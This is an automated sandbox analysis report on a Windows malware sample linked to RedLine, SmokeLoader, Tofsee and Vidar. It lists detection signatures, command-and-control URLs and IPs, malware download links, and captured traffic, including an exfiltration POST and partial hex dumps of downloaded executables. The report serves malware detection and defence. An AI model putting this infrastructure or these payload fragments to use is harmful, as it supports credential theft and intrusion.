Windows Analysis Report 4f4deRCUD7.exe

Overview

General Information

Sample Name: 4f4deRCUD7.exe
Analysis ID: 546824
MD5: 56e18023455303cd24f828173da31e2d
SHA1: 7877f8a39399b18af1e7c4fad422254b82e9a44c
SHA256: 29a5461cca77683d6a47c83eb774235bd0ae092adc58c987e571eeecb3e1cd03
Tags: exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php URL Reputation: Label: malware
Source: http://data-host-coin-8.com/game.exe Avira URL Cloud: Label: malware
Source: http://91.243.44.128/miner/new.exe Avira URL Cloud: Label: malware
Source: http://91.243.44.128/stlr/maps.exe Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/2264_1640622147_2258.exe Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe URL Reputation: Label: phishing
Source: http://privacytools-foryou-777.com/downloads/toolspab1.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dkbkykdu.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: 00000003.00000002.329414547.0000000000580000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
Source: 00000016.00000002.468965698.0000000003B71000.00000004.00000001.sdmp Malware Configuration Extractor: RedLine {"C2 url": "86.107.197.138:38133"}
Source: 21.3.2961.exe.7b0000.0.raw.unpack Malware Configuration Extractor: Tofsee {"C2 list": ["pa:443", "parubey.info:443"]}
Source: 19.3.1E73.exe.880000.0.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://file-file-host4.com/tratata.php"}
Multi AV Scanner detection for submitted file
Source: 4f4deRCUD7.exe Virustotal: Detection: 33% Perma Link
Multi AV Scanner detection for domain / URL
Source: file-file-host4.com Virustotal: Detection: 15% Perma Link
Source: unicupload.top Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3161.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\8DDA.exe Metadefender: Detection: 25% Perma Link
Source: C:\Users\user\AppData\Local\Temp\8DDA.exe ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\A7CD.exe ReversingLabs: Detection: 44%
Machine Learning detection for sample
Source: 4f4deRCUD7.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\ewswwsi Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8DDA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9667.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D845.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2961.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3161.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dkbkykdu.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 21.2.2961.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 21.3.2961.exe.7b0000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 19.3.1E73.exe.880000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 21.2.2961.exe.790e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.1E73.exe.860e50.1.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree, 19_2_00407510
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 19_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA, 19_2_00404830
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00407190 CryptUnprotectData, 19_2_00407190
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 19_2_004077A0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00864A80 CryptStringToBinaryA,CryptStringToBinaryA, 19_2_00864A80
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008676C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 19_2_008676C0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008673E0 CryptUnprotectData, 19_2_008673E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008679F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 19_2_008679F0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00867760 CryptUnprotectData,LocalAlloc,LocalFree, 19_2_00867760

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Unpacked PE file: 19.2.1E73.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2961.exe Unpacked PE file: 21.2.2961.exe.400000.0.unpack
Uses 32bit PE files
Source: 4f4deRCUD7.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.199.248.14:443 -> 192.168.2.3:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.158.215:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.207.80:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.208.83.45:443 -> 192.168.2.3:49863 version: TLS 1.2
Source: Binary string: M;C:\ros\jomo\kuxoxitin.pdb source: 4f4deRCUD7.exe, ewswwsi.11.dr
Source: Binary string: C:\ros\jomo\kuxoxitin.pdb source: 4f4deRCUD7.exe, ewswwsi.11.dr
Source: Binary string: C:\micat\xi.pdb source: 1E73.exe, 00000013.00000000.392170146.0000000000401000.00000020.00020000.sdmp, 1E73.exe.11.dr
Source: Binary string: /C:\kacij97\bokavepafecotu\hoxuteyitezet\wikipa\z.pdb source: 9667.exe.11.dr
Source: Binary string: C:\kacij97\bokavepafecotu\hoxuteyitezet\wikipa\z.pdb source: 9667.exe.11.dr
Source: Binary string: C:\hevetuzovuxa.pdb source: 2961.exe, 00000015.00000000.396557288.0000000000401000.00000020.00020000.sdmp, 2961.exe.11.dr, dkbkykdu.exe.21.dr
Source: Binary string: C:\zoci\kiz\ponecun6\camokixuki1\janel.pdb source: 8DDA.exe.11.dr
Source: Binary string: HC:\hevetuzovuxa.pdb source: 2961.exe, 00000015.00000000.396557288.0000000000401000.00000020.00020000.sdmp, 2961.exe.11.dr, dkbkykdu.exe.21.dr
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_00401280
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_00401090
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 19_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_004087E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 19_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00409970
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00866090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00866090
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_008614D0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 19_2_008612E0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00868A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00868A30
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 19_2_00869D90
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 19_2_00869BC0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00869930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 19_2_00869930

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49873 -> 185.163.204.24:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49873 -> 185.163.204.24:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: dodecoin.org
Source: C:\Windows\explorer.exe Domain query: bitly.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: short.link
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Domain query: botmaybe11.mcdir.me
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: bit.ly
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: pa:443
Source: Malware configuration extractor URLs: parubey.info:443
Source: Malware configuration extractor URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor URLs: http://file-coin-host-12.com/
Source: Malware configuration extractor URLs: http://file-file-host4.com/tratata.php
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=6g3726k5uv4pem6019kjak5c2h
Source: global traffic HTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----7QQ1NYCJM7GVAIE3Host: file-file-host4.comContent-Length: 93211Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=6g3726k5uv4pem6019kjak5c2h
Source: global traffic HTTP traffic detected: GET /miner/new.exe HTTP/1.1Host: 91.243.44.128Cache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:51 GMTContent-Type: application/x-msdos-programContent-Length: 350720Connection: closeLast-Modified: Fri, 31 Dec 2021 18:07:01 GMTETag: "55a00-5d47509a95695"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 17 37 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 20 04 00 00 d6 33 00 00 00 00 00 40 56 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 67 a4 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 1d 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 4c 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 1e 04 00 00 10 00 00 00 20 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 69 78 69 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 02 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Fri, 31 Dec 2021 18:07:56 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Wed, 08 Dec 2021 03:32:46 GMTETag: "9d9d8-5d29a24b21380"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:19 GMTContent-Type: application/x-msdos-programContent-Length: 844800Connection: closeLast-Modified: Mon, 27 Dec 2021 16:22:27 GMTETag: "ce400-5d4231c541a6e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 92 ed 9f 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 9e 0b 00 00 26 09 00 00 00 00 00 30 ee 09 00 00 10 00 00 00 b0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 48 00 00 04 00 00 92 c0 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 9c 0b 00 28 00 00 00 00 40 14 